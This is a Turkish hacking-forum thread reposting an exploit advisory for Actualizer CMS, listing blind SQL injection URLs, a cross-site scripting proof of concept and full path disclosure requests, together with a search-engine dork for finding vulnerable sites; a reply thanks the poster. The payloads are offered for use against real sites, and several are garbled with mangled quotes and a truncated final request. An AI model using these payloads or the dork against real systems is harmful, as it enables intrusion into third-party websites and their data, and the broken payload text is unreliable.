Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Actualizer CMS – Multiple Vulnerabilities
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 117
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Actualizer CMS – Multiple Vulnerabilities
20.01.2014 09:37
cyberizm

Title: Actualizer CMS – Multiple Vulnerabilities
Date: 22.09.2013
Tested on: Linux 3.0 – 3.9 (95%)
Vendor: actualizer.pl
Dork: intext:”Powered by Actualizer & Heuristic”
Contact:
[email protected]

1. Blind SQL Injection

PHP Kod:
host/galeria/galeria-/gal,1 ‘%20or%20’1′=’2.html – false
host
/galeria/galeria-2/gal,1 ‘%20or%20’1 ‘‘ 1. html – true 
PoC:

PHP Kod:
http://site/galeria/galeria-2/gal,1 ‘%20or%20 ’1′=’ 2. html 
2. Cross Site Scripting

PHP Kod:
host/katalog/nowosci/archiwum/year,”xss 
PoC:

PHP Kod:
site/katalog/nowosci/archiwum/year,”xss 
3. Full Path Disclosure
PHP Kod:
host/newsletter.php
POST
action=save&cat=666%email[]=asdf@asdf.com&imie=devil

host
/konto/rejestracja
POST 
(multipart): login=
Hide Post

Post Tagged In: Blind SQL Injection, exploits, sql injection, sqli, vulnerability
(Bu konu en son: 20.01.2014 Tarihinde, Saat: 09:47 düzenlenmiştir. Düzenleyen: DaRKNeSS.)


Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 42
Yaşam Puanı: 1,048 / 1,048
Deneyim: 95 / 100
Rep Sayısı: 1020
Mesaj Sayısı: 2983
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: Actualizer CMS – Multiple Vulnerabilities
20.01.2014 11:54
eline sağlık Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti



1 Ziyaretçi
[-]
Sponsor Reklam